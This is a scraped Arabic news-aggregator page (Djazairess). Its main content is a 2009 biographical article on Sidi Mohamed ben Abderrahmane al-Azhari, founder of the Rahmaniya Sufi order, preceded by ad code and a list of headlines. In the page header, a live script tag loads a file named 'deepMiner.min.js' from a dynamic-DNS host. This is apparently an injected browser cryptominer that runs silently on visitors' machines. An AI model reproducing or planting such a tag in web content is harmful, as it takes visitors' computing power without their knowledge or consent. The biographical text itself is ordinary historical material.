googletag.defineSlot('/21620968445/Djazairess_Ar_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-502778721-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_1', 'div-gpt-ad-502778721-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-502778719-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_3', 'div-gpt-ad-502778719-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-502778720-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Article_2', 'div-gpt-ad-502778720-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Widget', [[222, 280]], 'div-gpt-ad-1077287891-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Widget', 'div-gpt-ad-1077287891-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Ar_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-1575446168-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Ar_Siteunder', 'div-gpt-ad-1575446168-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); جزايرس : أقلام وأعلام <script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
ولد عباس يعتزل السياسة !!    توقيف 17 شابا حراقا بعنابة    التحالف يأمر بوقف الهجوم على الحديدة    المستفيدون من سكنات السوسيال بالحجار غير معنيين بالترحيل قبل نهاية العام    أزمة مياه بعنابة والطارف إلى إشعار آخر    استنفار في الأوساط الصحية بجيجل بعد تسجيل إصابات جديدة بداء البوحمرون    إيمانويل ماكرون: فرنسا حليفة أمريكا وليست تابعة لها    لن أحجّ.. فضميري إن يقتلني فهو يحييني    سيستقبلون حامل اللقب اليوم    خلال أحداث شغب في‮ ‬مقابلة مولودية الجزائر‮ - ‬اتحاد بلعباس    نظمتها المديرية العامة للحماية المدنية‮ ‬    المركز الوطني‮ ‬للكتاب‮ ‬يكشف‮:‬    البطولة العربية للأمم في‮ ‬كرة السلة    ليبرمان‮ ‬يستقيل احتجاجا على وقف إطلاق النار في‮ ‬غزة‮ ‬    نظم بمشاركة حوالي‮ ‬25‮ ‬عارضا بالشلف    حملة إعلامية لشرح تفاصيله تطلقها الوزارة‮ ‬    قال إن بلادنا خرجت من الكابوس بفضل سياسات بوتفليقة..أويحيى يؤكد:    تلمسان    الانتخابات ستجرى رسميا‮ ‬يوم‮ ‬29‮ ‬ديسمبر المقبل    الدالية تخطف الأضواء في‮ ‬البحرين    الجزائر اليوم على السكة الصحيحة    حزب العمال خزان للطاقات النضالية    من مرض السكري    5500 إصابة جديدة في 2018    حجز 1200 دولار مزوّرة    فتح فضاء جديد بوهران    روسيا تبتكر حاسوبا خارقا لصنع الأسلحة الجديدة    أجواء ونفحات روحانية متميزة في أدرار    البوابة الجزائرية للمخطوطات مشروع علمي طموح    26 ألف قتيل جزائري في الحرب العالمية الأولى    ملياردير يستعد للرئاسة الأمريكية المقبلة    أزمة يد عاملة في الفلاحة    إنتخاب أرنود مونتبورغ رئيسا جديدا لجمعية فرنسا-الجزائر    انطلاق حملة تحسيسية بالجزائر العاصمة    الإستعمال المفرط للمضادات الحيوية يهدد الصحة البشرية    مصابيح الدجى عبد الله بن رواحة    بن أحمد يعد بمواصلة دعم الفريق    تونس آيت علي تطرح مواضيع مسكوت عنها في مسرحية «ساكتة»    مليكة يوسف، صاولي وهندو لإدخال البسمة في نفوس الجمهور    فرق محترفة تمثل 7 مسارح للمشاركة في التظاهرة    والي وهران يتدخل لفتح الموقع الالكتروني ل «عدل « قبل التوزيع القادم    لا تسامح بعد اليوم    «الخضر" عازمون على رفع التحدي    «العنف اللفظي أكثر من الجسدي وبعض وسائل الإعلام تتحمل المسؤولية»    سيطرة فرق ولاية معسكر    وزارة النقل تُفرج عن مشروع إنجاز محطة بحرية جديدة بميناء الغزوات    نسبة الأشغال فاقت 80 %    المتهم يتمسك بأقواله أمام القاضي    تنصيب لجان متابعة تسيير المناطق    ‘'طفل السرطان" يعتذر لأمه    التصفيات الجهوية للأنشودة الوطنية    إبراز دور الزكاة الفعال    الدنمارك تعتمد رسميا وسيلة نقل جديدة    عائلة أوكرانية تحتجز 94 عبدا!    ‘'حيتان أسيرة" بروسيا    الشيخ شمس الدين:” أنا داعية إلى الله وخاطيني السياسة”    صفات وشكل وملامح وجه النبي صلى الله عليه وسلم    قصة الملكين هاروت وماروت    







شكرا على الإبلاغ!
سيتم حجب هذه الصورة تلقائيا عندما يتم الإبلاغ عنها من طرف عدة أشخاص.





أقلام وأعلام
العلامة سيدي محمّد بن عبد الرحمان الأزهري
نشر في المساء يوم 14 - 08 - 2009

الجزائر أنجبت من العلماء العاملين من تركوا لهم دويا ليس على مستوى المغرب العربي، بل على مستوى العالم الإسلامي، حيث أصبحوا أقطابا من أقطابه، وشموسا من شموسه، نشروا العلم، وعبّدوا طريق الصلاح والفلاح في أثر خطى نبي الرحمة محمد بن عبد الله صلى الله عليه وسلم، ففتحوا الأمصار بعلمهم دون أن يجردوا سيوفا أو يجيشوا جيوشا، اتبعهم خلق كثير خصوصا في القارة الإفريقية كالطريقة السنوسية والتجانية والرحمانية الخلواتية التي أسسها الولي الصالح والعالم الفالح سيدي محمد بن عبد الرحمان الأزهري، فانتشرت في الجزائر وأصبح لها قدم راسخ في العلم والجهاد.
الظاهرة التي يمكن ملاحظتها في المقاومة الجزائرية أنها نابعة عن علماء أجلاء من الدوحة النبوية الشريفة، فقادوا العقول إلى النور والحق، وقادوا المضطهدين إلى التحرر والجهاد بدءا من الأمير عبد القادر، الشيخ المقراني، الشريف بوبغلة، لالة فاطمة انسومر والمقاومة الرحمانية بقيادة الشيخ الحداد التي كان مؤسسها سيدي محمد بن عبد الرحمان الأزهري.
سيدي محمد بن عبد الرحمان من مواليد 1133 على الأرجح، ولد بقرية بو علاوة التي تقع ببلاد جرجرة، وهو الإسماعيلي عرشا، القشتولي قبيلة، واشتهر بالأزهري نسبة إلى جامع الأزهر الشريف الذي أسسه الفاطميون بعد فتحهم مصر.
نسبه:
هو محمد بن عبد الرحمان بن أحمد بن يوسف بن أبي القاسم بن علي بن إبراهيم بن عبد الرحمان بن أحمد بن الحسين بن طلحة بن جعفر بن محمد العسكري بن عيسى الرضي بن موسى المرتضى بن جعفر بن الصادق بن محمد بن عبد الله بن حمزة بن إدريس بن عبد الله بن محمد بن الحسن بن فاطمة الزهراء بنت رسول الله صلى الله عليه وسلم.
مشايخه:
أول من أخذ عنه العلم وتتلمذ على يديه في الجزائر هو الشيخ الصديق بن أعراب، حفظ القرآن الكريم ومبادئ العربية والعلوم الشرعية كالفقه والحديث والتفسير، وحين بلغ 19 سنة من عمره أم وجهه نحو البقاع المقدسة وذلك سنة 1152 للهجرة النبوية الشريفة فأدى فريضة الحج وجلس لعلماء الحرم المكي ومسجد الرسول بالمدينة المنورة، ثم قفل راجعا إلى وطنه الجزائر مرورا بمصر بوابة المغرب على المشرق، وفي طريق العودة عرج على الأزهر الشريف وجلس لحلقات علمائه فطاب له المقام بمصر فأقام بها، وفي جامع الأزهر تلقى العلم على يد كبار علمائه، منهم الشيخ أحمد بن محمد العدوي المعروف بالدرديري والشيخ علي بن أحمد الصعيدي والشيخ علي العمروسي والشيخ المنور التلمساني، وبعد أن أجيز من هؤلاء العلماء الذين أخذ عنهم العلم اتجه إلى الشيخ الصوفي المتبحر محمد بن سالم الحفناوي الخلوتي، فكان من مريديه، وسلك على يديه طريق التصوف، ولما أنس فيه الشيخ العلم والصلاح أجازه، فقال سيدي محمد بن عبد الرحمان لشيخه سيدي محمد بن سالم الحفناوي: "هذه الإجازة التي أجزتني بها بلسانك المبارك، وكتبتها لي ببنانك المبارك، ما كيفيتها يا أستاذي ؟ هل هي مقيدة في بعض العلوم دون بعض، أو عامة في سائر العلوم والأوراد لنفسي ولغيري من سائر تلاميذي وإخواني وغيرهم؟".
فقال الشيخ سيدي محمد بن سالم الحفناوي: "آذنتك إذنا عاما دائما لك ولغيرك ممن انتمى إليك، لا ينفعك إلا الإطلاق طول عمرك في كل زمان ومكان، الباب مفتوح لك ولمن أصدفك، خذ كتابي في الأسانيد فانسخه لتحمله معك أينما توجهت".
وبعد أن أجازه الشيخ الحفناوي أوفده إلى السودان فأقام بها ست سنوات في دار فور يقرئ السلطان ويعلم الناس ويدعو إلى سبيل ربه حتى ذاع صيته وصار له أتباع ومريدون كثيرون، وبعد أن قضى هذه المدة الطويلة بالسودان استدعاه الشيخ الحفناوي فعاد إلى القاهرة وعند عودته خلع عليه الخرقة وأذن له بالعودة إلى الجزائر لنشر الطريقة، وكانت عودته إلى الوطن سنة 1183 للهجرة النبوية المباركة.
عاد سيدي محمد بن عبد الرحمان إلى وطنه الجزائر واستقر في بداية أمره بمسقط رأسه ردهة من الزمن يعلم الناس مبادئ دينهم ويصلح ذات بينهم، وقد وفد عليه الطلاب من كل صوب ومكان لشهرته وسعة علمه، وأصبحت زاويته التي بناها قبلة لطلاب العلم ولمريدين طريقته الخلوتية التي تصبح فيما بعد تسمى نسبة إلى اسمه الرحمانية.
لم يطل به المكث في قريته لينتقل إلى الجزائر العاصمة ويستقر بمنطقة الحامة من أجل تعليم الناس، وكأي عالم تعرض للدسائس من قبل بعض علماء عصره واتهموه بالدجل والزندقة، وهذه الاتهامات جرت مع كثير من العلماء قبله وتواصلت من بعده.
استقر سيدي محمد بن عبد الرحمان في منطقة الحامة التي توجد بها مدرسته وضريحه، والتي تسمى الآن باسمه بلدية سيدي محمد، ولم يدم به المقام طويلا حتى واجهته المشاكل السالف ذكرها مع العلماء الذين كادوا له واتهموه بالزندقة لأنهم ليسوا علماء قلوب أو مروضي النفوس الأمارة بالسوء والنزاعة للهوى، وقد كاد له هؤلاء العلماء عند الداي محمد عثمان الذي نصب له محكمة دينية تحاكمه وتسأله عن بدعه في الدين من خلال التهم التي اتهمه بها العلماء، إلا أن الاتهامات التي اتهم بها لم تصمد أمامه طويلا حيث هدمها بالحجج الناصعة، وأبطل جميع الآراء التي جاء بها هؤلاء وبرئت ساحته من الزندقة، مما رفع مكانته عند الداي، إلا أن سيدي محمد بن عبد الرحمان لم يمكث طويلا بالحامة وقرر الرجوع إلى قريته وكأنه يأخذ بقول المتنبي:
"وما مقامي بأرض نخلة إلا كمقام المسيح بين اليهود"
عاد سيدي محمد إلى مسقط رأسه آيت إسماعيل "بونوح" بوغني ولاية البويرة حاليا وأسس بها زاوية جديدة وتفرغ للتعليم ونشر طريقته الخلوتية، وتتلمذ على يديه كبار أقطاب الطرية أمثال الشيخ محمد بن عزوز البرجي، وعلي بن عيسى المغربي، ومحمد بن أبي القاسم الهاملي، والشيخ عبد الرحمان باش طارزي القسنطيني وغيرهم ممن نشروا الطريقة الرحمانية وأقاموا مدارسها وزواياها كزاوية الهامل بمدينة بوسعادة وزاوية طولقة التي أسسها علي بن عثمان والحملاوية، ولم تكن هذه الزواية مصدرا للعلم وإصلاح ذات البين بين الناس والتكفل بالأيتام والأرامل وابن السبيل وإقامة الصلح بين القبائل والأعراش المتخاصمين على الأرض ومناطق الرعي والحرث، بل تعدت إلى مهمة الجهاد ضد الاستعمار الفرنسي وتاريخها في المقاومة معروف من قبل شيوخها وطلبتها بإعلانهم الجهاد.
توفي سيدي محمد بن عبد الرحمان الأزهري سنة 1208 من الهجرة النبوية الشريفة الموافق لسنة 1793 من ميلاد المسيح عليه السلام وعلى نبينا الصلاة والسلام.
وترك سيدي محمد عدة مؤلفات ورسائل نذكر منها "رسالة فتح الباب" و"رسالة طي الأنفاس" و"دفتر الدفاتر".
حياة الشيخ محمد بن عبد الرحمان الأزهري حافلة بالمواقف الجليلة والأعمال العظيمة، مما جعله قطبا من أقطاب التصوف السني العامل بالكتاب والسنة على المذهب المالكي والعقيدة الأشعرية.
حياة الشيخ رحمة الله عليه فيها الكثير من الكرامات، بل ودخلها الكثير من الخرافات حتى أصبح مشهورا عند العوام بسيدي محمد أبو قبرين، فقبر بالحامة وقبر آخر بقريته وهو يزار بالقبرين، هذه الحياة الحافلة بالعلم والتعليم والتوجيه والدعوة لو وجدت من يستغلها من مخرجينا لصنعوا منها تحفة فنية ولو أثروا منتوجنا السينمائي والتلفزيون بكثير من الأعمال الجميلة والجليلة وسدوا الفراغ الذي نعاني منه في هذا المجال وكفونا من الاستيراد من الخارج وبالأخص ما يطلق عليه أهل صنعة المسلسلات بالمسلسلات الرمضانية.


انقر هنا لقراءة الخبر من مصدره.